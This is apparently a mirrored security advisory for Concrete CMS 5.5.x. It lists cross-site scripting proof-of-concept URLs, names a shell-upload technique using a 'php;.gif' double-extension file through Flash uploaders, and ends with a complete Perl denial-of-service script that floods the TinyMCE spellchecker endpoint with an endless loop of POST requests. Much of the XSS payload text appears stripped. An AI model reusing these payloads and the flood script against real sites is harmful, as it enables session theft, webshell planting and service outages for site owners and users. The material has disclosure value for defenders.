source: https://www.securityfocus.com/bid/53640/info Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input. 1. Multiple cross-site scripting vulnerabilities 2. An arbitrary-file-upload vulnerability 3. A denial-of-service vulnerability An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Concrete CMS versions 5.5 and 5.5.21 are vulnerable. Cross Site Scripting: 1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="> 2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=">&searchInstance=file1337335625 3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="> 3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="> www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="> 4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]= 4A)(without onmouseover event) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=">&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]= 5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="> 6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');&fID=7 &fid=VALID_ID_OF_IAMGE 7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance=">&fID=owned 8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance=">&fID=4 9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="> &fid=VALID_ID_OF_IAMGE 10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance=">&fID=owned 11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=">&node=owned&display_mode=full&select_mode=&selectedPageID= 11A) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=">&display_mode=full&select_mode=&selectedPageID= 11B) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=">&select_mode=&selectedPageID= 11C) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="> 11D) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=">&selectedPageID=owned (All parameters goes to page source without any sanitization +validation) 12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID=">&search=1 13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="> Shell upload: #### p0c 1 [ Upload File via FlashUploader ] ###==> http://www.example.com/concrete/flash/thumbnail_editor_2.swf http://www.example.com/concrete/flash/thumbnail_editor_3.swf http://www.example.com/concrete/flash/swfupload/swfupload.swf http://www.example.com/concrete/flash/uploader/uploader.swf # Upload File/Shell Inj3ct0r.php;.gif DOS: #### p0c 2 [ DDos with RPC 'using simple PERL script]===> #!/usr/bin/perl use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<66; $i--) { $user="w00t".$rand.$i; $data = "Aa" ; $lenx = length $data; $rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $lenx\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$rpc", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 \n"; print "\Ex: $0 127.0.0.1 /concrete/\n"; print "\Ex2: $0 target.com /\n\n"; exit(); }; # << ThE|End